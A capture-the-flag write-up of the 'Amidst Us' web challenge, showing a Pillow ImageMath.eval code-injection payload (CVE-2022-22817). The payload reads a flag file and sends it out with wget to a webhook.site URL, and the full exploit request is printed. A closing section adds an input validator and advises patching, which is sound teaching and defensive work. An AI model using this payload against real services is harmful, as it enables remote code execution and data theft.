Cyber Apocalypse 2022 - Web - Amidst Us

Amidst Us

amidst_us_1

Loading up the page, we see a weird spotlight page à la Among Us, and we can upload images to replace our two sus peeps.

(Apologies, didn’t get a better pic but there is something there!)

POST /api/alphafy HTTP/1.1

{ 
    "image":"iVBORw...ElFTkSuQmCC",
    "background":[ 
        255, 
        255, 
        255 
    ] 
}

So the request sends an encoded image and the background colors. Looking at the source code, we see that it uses ImageMath.eval, which has a known CVE:

new_bands = [
    ImageMath.eval(
        'convert((image - color) / alpha + color, "L")',
        image=img_bands[i],
        color=color[i],
        alpha=alpha
    )
    for i in range(3)
]

Since ImageMath.eval works on the color values, we can try CVE-2022-22817 by putting the following payload in any of the background parameters. It cats the flag file and uses wget to send the contents back to a webhook as a GET parameter:

"exec('import os;os.system(\"flag=$(cat ../flag.txt);wget https://webhook.site/{your_webhook_uuid}?flag=${flag}\")')"

Final payload

POST /api/alphafy HTTP/1.1

{ 
    "image":"iVBORw...ElFTkSuQmCC",
    "background":[ 
        "exec('import os;os.system(\"flag=$(cat ../flag.txt);wget https://webhook.site/{your_webhook_uuid}?flag=${flag}\")')", 
        255, 
        255 
    ] 
}

Flag: HTB{i_slept_my_way_to_rce}
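
On the defensive side, the payload only works because a string is accepted where a color channel is expected. The following is an added example, not code from the challenge or from Pillow: a strict validator for the /api/alphafy body that would run before any value reaches ImageMath.eval. The function names and the size limit are assumptions made for illustration.

```python
import base64
import binascii
import json

MAX_IMAGE_BYTES = 5 * 1024 * 1024  # assumed upload limit, not from the challenge


def validate_background(value):
    """Return the background as a tuple of three ints in 0..255, or raise ValueError."""
    if not isinstance(value, list) or len(value) != 3:
        raise ValueError("background must be a list of three channels")
    channels = []
    for channel in value:
        # type() rather than isinstance(): bool is a subclass of int, and
        # strings or floats must never be coerced into a number here.
        if type(channel) is not int or not 0 <= channel <= 255:
            raise ValueError(f"invalid channel value: {channel!r}")
        channels.append(channel)
    return tuple(channels)


def parse_alphafy_request(raw_body):
    """Parse a JSON body shaped like the /api/alphafy request shown above."""
    try:
        data = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        raise ValueError("body is not valid JSON") from exc
    if not isinstance(data, dict):
        raise ValueError("body must be a JSON object")
    image_b64 = data.get("image")
    if not isinstance(image_b64, str):
        raise ValueError("image must be a base64 string")
    try:
        image = base64.b64decode(image_b64, validate=True)
    except binascii.Error as exc:
        raise ValueError("image is not valid base64") from exc
    if not image or len(image) > MAX_IMAGE_BYTES:
        raise ValueError("image is empty or too large")
    # The default mirrors the white background in the captured request.
    background = validate_background(data.get("background", [255, 255, 255]))
    return image, background


# Constructed sample bodies: a benign one and one with a string in a channel.
GOOD = json.dumps({"image": base64.b64encode(b"\x89PNG constructed").decode(),
                   "background": [255, 255, 255]})
BAD = json.dumps({"image": base64.b64encode(b"\x89PNG constructed").decode(),
                  "background": ["<expression string>", 255, 255]})
```

Input validation here is defence in depth; the application still needs a Pillow release that fixes CVE-2022-22817.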

This post is licensed under CC BY 4.0 by the author.